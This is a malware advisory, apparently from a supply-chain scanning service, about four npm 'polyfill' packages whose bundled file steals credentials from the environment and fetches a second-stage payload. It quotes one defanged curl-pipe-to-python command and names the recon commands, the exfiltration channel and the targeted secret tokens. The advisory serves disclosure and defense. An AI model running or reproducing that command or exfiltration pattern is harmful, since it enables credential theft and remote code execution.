LWA-2026-12578 MAL-2026-17578 ↗ confirmed malware

css-yhpodl-polyfill@1.0.0

Malicious code in css-yhpodl-polyfill (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1059.004 · Unix ShellT1082 · System Information DiscoveryT1552.001 · Credentials In FilesT1071.001 · Web ProtocolsT1102 · Web ServiceT1105 · Ingress Tool TransferT1041 · Exfiltration Over C2 Channel

Analysis

Four npm packages — css-yhpodl-polyfill, css-eqxcdx-polyfill, css-kfvwax-polyfill and css-nrmgzn-polyfill (all @1.0.0) — ship an identical credential-stealing payload in package/thunderboltRegistry.js that runs as soon as the module is loaded. The package.json declares no install hooks and package/index.js is an empty stub; the payload is reached by requiring the bundled thunderboltRegistry.js, which also exports Proxy-based stubs under nine Adobe/Corvid registry names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, dataBindingRegistry, autoCompleteRegistry, thunderboltBuilderRegistry, thunderboltPreviewRegistry) so the module reads as a legitimate registry polyfill. On load the file first deletes itself from require.cache so it cannot be found afterwards, then uses child_process.execSync to run `id`, `id -un`/`whoami`, `env`, `uname -a` and `ifconfig`/`ip addr`, and sends each result as a URL query string to hxxps://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9[.]oastify[.]com/ (a Burp Collaborator-style collector), tagging every request with the victim hostname. The `cmd=env` request exfiltrates the entire process environment, including NPM_TOKEN, GITHUB_TOKEN/GH_TOKEN, NODE_AUTH_TOKEN, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN, OPENAI_API_KEY, ANTHROPIC_API_KEY, STRIPE_SECRET_KEY, SLACK_TOKEN, GITLAB_TOKEN, CI_JOB_TOKEN, DOCKER_PASSWORD, DIGITALOCEAN_TOKEN, CLOUDFLARE_API_TOKEN, SENDGRID_API_KEY, TWILIO_AUTH_TOKEN, PYPI_TOKEN, HF_TOKEN, VERCEL_TOKEN, NETLIFY_AUTH_TOKEN and CARGO_REGISTRY_TOKEN. It then runs `curl -L hxxps://appsecc[.]com/py | python3` to fetch and execute a second-stage Python payload from a non-standard host, and posts a beacon (node version, platform, pid, timestamp) to the same collector. IOCs: C2/exfil collector hxxps://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9[.]oastify[.]com/ ; second-stage payload host hxxps://appsecc[.]com/py .

analyzed by
Leitwacht
first seen
Oct 5, 2026, 10:32 AM
analyzed
Oct 5, 2026, 10:59 AM

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.